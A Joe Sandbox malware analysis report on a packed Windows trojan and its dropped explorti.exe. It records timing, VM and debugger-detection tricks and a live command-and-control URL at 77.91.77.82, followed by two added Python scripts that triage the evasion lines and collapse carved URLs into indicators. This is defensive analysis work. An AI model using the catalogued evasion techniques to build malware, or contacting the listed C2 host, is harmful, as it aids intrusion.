Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 53D0885 second address: 53D0889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 53D0889 second address: 53D089F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 53D089F second address: 53D08B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8B8C9EEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 53D08B1 second address: 53D08D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1CC8BB7C3Bh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 53D08D5 second address: 53D08DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 53D08DB second address: 53D08EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C3Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 53D08EA second address: 53D0901 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1CC8B8C9EBh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 53D0901 second address: 53D093C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jmp 00007F1CC8BB7C41h 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov dx, 331Eh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 53D093C second address: 53D0989 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F1CC8B8C9E9h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov edx, 76EBDAA6h 0x00000016 pushfd 0x00000017 jmp 00007F1CC8B8C9F7h 0x0000001c jmp 00007F1CC8B8C9F3h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 53D0989 second address: 53D098F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: 53D098F second address: 53D09CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov edx, 79D3019Ah 0x00000012 mov di, 9D66h 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jmp 00007F1CC8B8C9ECh 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F1CC8B8C9EEh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Special instruction interceptor: First address: A6EB77 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Special instruction interceptor: First address: A6C0AE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Special instruction interceptor: First address: C1F84B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Special instruction interceptor: First address: C9FB86 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Special instruction interceptor: First address: 44EB77 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Special instruction interceptor: First address: 44C0AE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Special instruction interceptor: First address: 5FF84B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Special instruction interceptor: First address: 67FB86 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Code function: 0_2_054302D7 rdtsc 0_2_054302D7
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Window / User API: threadDelayed 1366
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Window / User API: threadDelayed 1012
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Window / User API: threadDelayed 484
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Window / User API: threadDelayed 958
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Window / User API: threadDelayed 948
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Window / User API: threadDelayed 1315
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3524 | Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3524 | Thread sleep time: -62031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 4348 | Thread sleep count: 1366 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 4348 | Thread sleep time: -2733366s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6020 | Thread sleep count: 1012 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 6020 | Thread sleep time: -2025012s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2260 | Thread sleep count: 484 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2260 | Thread sleep time: -14520000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7096 | Thread sleep time: -540000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 280 | Thread sleep count: 958 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 280 | Thread sleep time: -1916958s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1360 | Thread sleep count: 948 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 1360 | Thread sleep time: -1896948s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 4960 | Thread sleep count: 1315 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 4960 | Thread sleep time: -2631315s >= -30000s
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Thread delayed: delay time: 180000
Source: explorti.exe, explorti.exe, 00000006.00000002.2350660627.00000000005D1000.00000040.00000001.01000000.00000007.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorti.exe, 00000001.00000002.4150196753.0000000001046000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWN
Source: explorti.exe, 00000001.00000002.4150196753.0000000001046000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: Jl5yg1Km2s.exe, 00000000.00000002.1762379718.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000006.00000002.2350660627.00000000005D1000.00000040.00000001.01000000.00000007.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: explorti.exe, 00000001.00000002.4150196753.0000000001003000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW`
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Code function: 0_2_054302D7 rdtsc 0_2_054302D7
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Code function: 1_2_0041643B mov eax, dword ptr fs:[00000030h] 1_2_0041643B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Code function: 1_2_0041A1A2 mov eax, dword ptr fs:[00000030h] 1_2_0041A1A2
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: explorti.exe, explorti.exe, 00000006.00000002.2350660627.00000000005D1000.00000040.00000001.01000000.00000007.sdmp | Binary or memory string: OProgram Manager
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Code function: 1_2_003FD2E8 cpuid 1_2_003FD2E8
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | Code function: 1_2_003FCAED GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 1_2_003FCAED
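The sleep and thread-delay lines in the sandbox-evasion section above and the HideFromDebugger, DebugPort, window-name and SoftICE-device probes in the Anti Debugging section are the raw material an analyst turns into a triage summary. The script below is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling; it parses a constructed subset of this report's own signature lines (copied above, with the fused cell boundaries left as extracted) and works out per-thread sleep intervals, the sleep pattern each thread exhibits, and which debugger probes the sample made. Assumptions it makes: the "Thread sleep time" figures are milliseconds (consistent with the report pairing "delay time: 180000" with its "long sleeps (>= 3 min)" signature), and the loop/long-sleep thresholds are the author's own, not Joe Sandbox's. The mapping of "HideFromDebugger" and "DebugPort" to NtSetInformationThread(ThreadHideFromDebugger) and NtQueryInformationProcess(ProcessDebugPort), and of NTICE/SICE/SIWVID to SoftICE driver device names, is standard anti-debug knowledge rather than something the report states.

```python
"""Summarise the sandbox-evasion and anti-debug lines of a Joe Sandbox listing.

Added example, not from the report. SAMPLE_LINES is a constructed subset of
this report's signature lines. Assumption: "Thread sleep time" values are
milliseconds shown as negative numbers with an "s" suffix, which is stripped.
"""
import re

SAMPLE_LINES = r"""
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3524Thread sleep count: 31 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 3524Thread sleep time: -62031s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 4348Thread sleep count: 1366 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 4348Thread sleep time: -2733366s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2260Thread sleep count: 484 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 2260Thread sleep time: -14520000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7096Thread sleep time: -540000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5420D80 second address: 5420D8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 5420D8F second address: 5420D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000009 rdtsc
"""

SLEEP_COUNT_RE = re.compile(r"TID: (\d+)\D*?Thread sleep count: (\d+)")
SLEEP_TIME_RE = re.compile(r"TID: (\d+)\D*?Thread sleep time: -(\d+)s")
WINDOW_RE = re.compile(r"Open window title or class name: (.+)$")
DEVICE_RE = re.compile(r"File opened: (\S+)")

# Native calls behind two of Joe's labels (ntdll information classes).
NT_API = {
    "HideFromDebugger": "NtSetInformationThread(ThreadHideFromDebugger=0x11)",
    "DebugPort": "NtQueryInformationProcess(ProcessDebugPort=7)",
}
LOOP_MIN_CALLS = 30    # Joe's own "> 30" threshold, reused for the loop label
LONG_SLEEP_MS = 30_000  # assumption: one call waiting >= 30 s is a "long sleep"


def clean(line):
    """Drop the 'Jump to behavior' link residue appended to table cells."""
    return line.replace("Jump to behavior", "").strip()


def sleep_stats(lines):
    """Per-thread sleep count, total wait and average wait per call (ms)."""
    counts, totals = {}, {}
    for line in map(clean, lines):
        if (m := SLEEP_COUNT_RE.search(line)):
            counts[int(m.group(1))] = int(m.group(2))
        elif (m := SLEEP_TIME_RE.search(line)):
            totals[int(m.group(1))] = int(m.group(2))
    stats = {}
    for tid in sorted(counts.keys() | totals.keys()):
        n, total = counts.get(tid), totals.get(tid)
        # A thread may report a time line but no count line (TID 7096 here);
        # its average is then unknown rather than guessed.
        per_call = round(total / n) if n and total is not None else None
        stats[tid] = {"count": n, "total_ms": total, "per_call_ms": per_call}
    return stats


def classify_sleeps(stats):
    """Label threads as tight sleep loops, single long waits, or unknown."""
    out = {"sleep_loop": [], "long_sleep": [], "unknown": []}
    for tid, s in stats.items():
        if s["per_call_ms"] is None:
            out["unknown"].append(tid)
        elif s["per_call_ms"] >= LONG_SLEEP_MS:
            out["long_sleep"].append(tid)
        elif s["count"] > LOOP_MIN_CALLS:
            out["sleep_loop"].append(tid)
        else:
            out["unknown"].append(tid)
    return out


def debugger_checks(lines):
    """Count debugger/timing probes and list the tool names looked for."""
    s = {"hide_from_debugger": 0, "debug_port_queries": 0,
         "rdtsc_pairs": 0, "windows": [], "devices": []}
    for line in map(clean, lines):
        if "Thread information set: HideFromDebugger" in line:
            s["hide_from_debugger"] += 1
        elif "Process queried: DebugPort" in line:
            s["debug_port_queries"] += 1
        elif "RDTSC instruction interceptor" in line:
            s["rdtsc_pairs"] += 1  # two rdtsc reads bracketing a timing check
        elif (m := WINDOW_RE.search(line)):
            s["windows"].append(m.group(1).strip())
        elif (m := DEVICE_RE.search(line)):
            s["devices"].append(m.group(1))  # SoftICE device names
    s["native_apis"] = [NT_API[k] for k, n in
                        (("HideFromDebugger", s["hide_from_debugger"]),
                         ("DebugPort", s["debug_port_queries"])) if n]
    return s


def summarize(text):
    lines = text.strip().splitlines()
    stats = sleep_stats(lines)
    return {"sleeps": stats, "sleep_pattern": classify_sleeps(stats),
            "anti_debug": debugger_checks(lines)}


if __name__ == "__main__":
    import json
    print(json.dumps(summarize(SAMPLE_LINES), indent=2))
```

On this report's numbers the loop threads all come out at 2001 ms per call, while TID 2260 waits 30000 ms per call; the two patterns are worth keeping separate because a sandbox that fast-forwards short sleeps can still be defeated by the long ones.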

Stealing of Sensitive Information

Source: Yara match | File source: 1.2.explorti.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.explorti.exe.3e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Jl5yg1Km2s.exe.a00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000003.1777304943.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.2310206865.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1721841303.0000000005210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2350558815.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1762264441.0000000000A01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
MITRE ATT&CK Matrix

Reconstructed from the flattened matrix grid. Only cells that carry a count are listed; the remaining cells are the unmarked ATT&CK grid, not observations.

Tactic | Technique (count shown in the matrix)
Reconnaissance | none
Resource Development | none
Initial Access | none
Execution | Command and Scripting Interpreter (2); Scheduled Task/Job (1)
Persistence | Scheduled Task/Job (1); DLL Side-Loading (1)
Privilege Escalation | Process Injection (12); Scheduled Task/Job (1); DLL Side-Loading (1)
Defense Evasion | Masquerading (1); Virtualization/Sandbox Evasion (251); Process Injection (12); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access | none
Discovery | System Time Discovery (1); Security Software Discovery (741); Process Discovery (2); Virtualization/Sandbox Evasion (251); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (224)
Lateral Movement | none
Collection | Archive Collected Data (1)
Command and Control | Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (1); Application Layer Protocol (11)
Exfiltration | none
Impact | none
Source | Detection | Scanner | Label
Jl5yg1Km2s.exe | 79% | ReversingLabs | Win32.Trojan.Multiverze
Jl5yg1Km2s.exe | 100% | Avira | TR/Crypt.TPM.Gen
Jl5yg1Km2s.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | 100% | Avira | TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe | 79% | ReversingLabs | Win32.Trojan.Multiverze
                  No Antivirus matches
                  No Antivirus matches
Source | Detection | Scanner | Label
http://77.91.77.82/Hun4Ko/index.php | 100% | URL Reputation | phishing
http://77.91.77.82/Hun4Ko/index.php8 | 0% | Avira URL Cloud | safe
http://77.91.77.82/ | 0% | Avira URL Cloud | safe
http://77.91.77.82/Hun4Ko/index.php? | 100% | Avira URL Cloud | phishing
http://77.91.77.82/Hun4Ko/index.php2 | 0% | Avira URL Cloud | safe
http://77.91.77.82/Hun4Ko/index.phpKR | 0% | Avira URL Cloud | safe
http://77.91.77.82/Hun4Ko/index.phpe | 0% | Avira URL Cloud | safe
http://77.91.77.82/Hun4Ko/index.php$ | 0% | Avira URL Cloud | safe
                  No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://77.91.77.82/Hun4Ko/index.php | true | URL Reputation: phishing | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://77.91.77.82/Hun4Ko/index.php$ | explorti.exe, 00000001.00000002.4150196753.0000000001003000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://77.91.77.82/ | explorti.exe, 00000001.00000002.4150196753.0000000001034000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://77.91.77.82/Hun4Ko/index.php2 | explorti.exe, 00000001.00000002.4150196753.0000000001003000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://77.91.77.82/Hun4Ko/index.php? | explorti.exe, 00000001.00000002.4150196753.0000000001046000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
http://77.91.77.82/Hun4Ko/index.php8 | explorti.exe, 00000001.00000002.4150196753.0000000001003000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://77.91.77.82/Hun4Ko/index.phpKR | explorti.exe, 00000001.00000002.4150196753.0000000001034000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://77.91.77.82/Hun4Ko/index.phpe | explorti.exe, 00000001.00000002.4150196753.0000000001003000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
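The URL tables above list one C2 endpoint seven times, because strings carved from process memory run past the terminator and pick up trailing bytes ("index.php$", "index.phpKR", "index.php8"), and the per-variant verdicts disagree (100% phishing for the clean form, 0% safe for most carves). The script below is an added example, not part of the Joe Sandbox report; it takes a constructed copy of the table rows above, collapses carve variants onto the URL they extend, carries the strongest verdict across the group, and emits the canonical URLs and hosts as indicators. The collapse rule (a variant is the same URL if it extends an already-seen URL by at most two characters containing no path separator) is the author's heuristic, not a Joe Sandbox rule.

```python
"""Collapse memory-carved URL variants from a sandbox report into C2 IOCs.

Added example, not from the report. URL_TABLE is a constructed copy of the
report's URL scanner rows: (url, detection %, scanner, label).
"""
import ipaddress
from urllib.parse import urlsplit

URL_TABLE = [
    ("http://77.91.77.82/Hun4Ko/index.php", 100, "URL Reputation", "phishing"),
    ("http://77.91.77.82/Hun4Ko/index.php8", 0, "Avira URL Cloud", "safe"),
    ("http://77.91.77.82/", 0, "Avira URL Cloud", "safe"),
    ("http://77.91.77.82/Hun4Ko/index.php?", 100, "Avira URL Cloud", "phishing"),
    ("http://77.91.77.82/Hun4Ko/index.php2", 0, "Avira URL Cloud", "safe"),
    ("http://77.91.77.82/Hun4Ko/index.phpKR", 0, "Avira URL Cloud", "safe"),
    ("http://77.91.77.82/Hun4Ko/index.phpe", 0, "Avira URL Cloud", "safe"),
    ("http://77.91.77.82/Hun4Ko/index.php$", 0, "Avira URL Cloud", "safe"),
]

MAX_CARVE_JUNK = 2   # assumption: over-read tails seen in practice are short
FLAG_MIN_PCT = 50    # assumption: a group is "flagged" above this detection


def is_carve_junk(tail):
    """Trailing bytes that look like over-read memory, not a distinct path."""
    return len(tail) <= MAX_CARVE_JUNK and "/" not in tail


def collapse_variants(entries):
    """Group each URL under the longest already-seen URL it extends by junk.

    Entries are processed shortest first, so the clean form of a URL is seen
    before its carved variants and becomes the group key.
    """
    groups = {}
    for url, pct, scanner, label in sorted(entries, key=lambda e: len(e[0])):
        # Longest candidate first so ".../index.php" wins over "http://host/".
        for canon in sorted(groups, key=len, reverse=True):
            if url.startswith(canon) and is_carve_junk(url[len(canon):]):
                break
        else:
            canon = url
            groups[canon] = {"variants": [], "max_detection": 0, "verdicts": set()}
        g = groups[canon]
        g["variants"].append(url)
        g["max_detection"] = max(g["max_detection"], pct)
        g["verdicts"].add((scanner, label))
    return groups


def iocs(groups):
    """Canonical URLs and hosts; literal-IP hosts are called out separately."""
    urls = sorted(groups)
    hosts = sorted({urlsplit(u).hostname for u in urls})
    literal_ips = []
    for h in hosts:
        try:
            ipaddress.ip_address(h)
            literal_ips.append(h)  # no DNS involved, block at the IP layer
        except ValueError:
            pass
    flagged = [u for u in urls if groups[u]["max_detection"] >= FLAG_MIN_PCT]
    return {"urls": urls, "hosts": hosts,
            "literal_ip_hosts": literal_ips, "flagged_urls": flagged}


if __name__ == "__main__":
    groups = collapse_variants(URL_TABLE)
    for canon, g in groups.items():
        print(f"{canon}  variants={len(g['variants'])}  "
              f"max_detection={g['max_detection']}%  verdicts={sorted(g['verdicts'])}")
    print(iocs(groups))
```

The carve rule is deliberately narrow: "http://77.91.77.82/" is a prefix of the C2 URL but the remainder contains a slash, so it stays a separate (and, on the page's evidence, unflagged) indicator rather than being merged in.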
IP | Domain | Country | ASN | ASN Name | Malicious
77.91.77.82 | unknown | Russian Federation | 42861 | FOTONTELECOM-TRANSIT-AS FOTONTELECOM ISP RU | true
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1483218
                  Start date and time:2024-07-26 21:07:07 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 9m 1s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:7
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Sample name:Jl5yg1Km2s.exe
                  renamed because original name is a hash value
